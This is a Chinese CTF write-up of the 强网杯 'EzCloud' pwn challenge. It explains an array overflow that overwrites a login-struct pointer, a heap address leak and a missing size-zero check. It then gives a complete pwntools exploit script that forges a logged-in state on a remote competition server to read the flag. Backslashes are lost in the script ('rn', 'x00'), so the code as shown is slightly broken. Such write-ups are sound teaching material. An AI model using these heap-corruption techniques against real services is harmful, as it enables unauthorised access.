在比赛中代表星盟安全团队参赛的北极星队拿到了这道pwn题的一血
EzCloud
notepad功能中存在一个数组溢出,可以将第17个位置的指针覆盖掉
即可以覆盖LoginMsg指针,进而通过控制好堆布局,能够伪造一个登陆信息
通过伪造LoginMsg的isLogined为1,即可解锁功能,通过/flag功能获得flag
同时,getMsg有可能不会初始化结构体,当a1->msgs2.buf为NULL时,进而可以通过悬挂的指针泄露堆里面的地址
在parse解析的时候没有判断v9是否为0,因此可以得到size为0的Msg
EXP
#coding:utf8
from pwn import *
#sh = process('./EzCloud')
sh = remote('47.94.234.66',37128)
def login(user):
payload = 'POST /loginrn'
payload += 'Login-ID: {}rn'.format(user)
payload += 'rnrn'
sh.send(payload)
sh.recvuntil('Success!')
def logout(user):
payload = 'POST /logoutrn'
payload += 'Login-ID: {}rn'.format(user)
payload += 'rnrn'
sh.send(payload)
sh.recvuntil('Success!')
def create_vm(name):
payload = 'POST /createvmrn'
payload += 'Login-ID: {}rn'.format(name)
payload += 'rnrn'
sh.send(payload)
def add_size0(user):
payload = 'POST /notepadrn'
payload += 'Login-ID: {}rn'.format(user)
payload += 'Note-Operation: new%20notern'
payload += 'Content-Length: {}rn'.format(0)
payload += 'Content-Type: multipart/form-datarn'
payload += 'rn'
sh.send(payload)
sh.recvuntil('Notepad operation done')
def add(user,content):
payload = 'POST /notepadrn'
payload += 'Login-ID: {}rn'.format(user)
payload += 'Note-Operation: new%20notern'
payload += 'Content-Length: {}rn'.format(len(content))
payload += 'Content-Type: application/x-www-form-urlencodedrn'
payload += 'rn'
payload += content + 'rn'
sh.send(payload)
sh.recvuntil('Notepad operation done')
def delete(user,index):
payload = 'POST /notepadrn'
payload += 'Login-ID: {}rn'.format(user)
payload += 'Note-Operation: delete%20notern'
payload += 'Note-ID: {}rn'.format(index)
payload += 'rn'
sh.send(payload)
sh.recvuntil('Notepad operation done')
def edit(user,index,content):
payload = 'POST /notepadrn'
payload += 'Login-ID: {}rn'.format(user)
payload += 'Note-Operation: edit%20notern'
payload += 'Note-ID: {}rn'.format(index)
payload += 'Content-Length: {}rn'.format(len(content))
payload += 'Content-Type: application/x-www-form-urlencodedrn'
payload += 'rn'
payload += content + 'rn'
sh.send(payload)
sh.recvuntil('Notepad operation done')
def show(user):
payload = 'GET /notepadrn'
payload += 'Login-ID: {}rn'.format(user)
payload += 'rn'
sh.send(payload)
def get_flag(user):
payload = 'GET /flagrn'
payload += 'Login-ID: {}rn'.format(user)
payload += 'rn'
sh.send(payload)
login('a')
add('a','a'*0x10)
delete('a',0)
#raw_input()
add('a','a'*0x10)
add('a','b'*0x10)
for i in range(5):
add_size0('a')
add('a','a'*0x18)
show('a')
sh.recvuntil('b'*0x10)
sh.recvuntil('<p>')
heap_addr = u64(sh.recv(6).ljust(8,'x00'))
print 'heap_addr=',hex(heap_addr)
for i in range(8):
add('a','c'*0x10)
#数组溢出,覆盖next指针
add('a','d'*0x10)
logout('a')
raw_input()
fakeLoginMsg_addr = heap_addr + 0x2e80
payload = 'hrnrn'
payload += 'h'*0x6
payload += p64(1) + p64(fakeLoginMsg_addr + 0x20) + p64(0x1) + p64(0x1)
payload = payload.ljust(0x6b,'h')
payload += p64(fakeLoginMsg_addr)
payload = payload.ljust(0x120,'h')
get_flag(payload)
sh.interactive()本文始发于微信公众号(星盟安全):强网杯 ezCloud题解
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论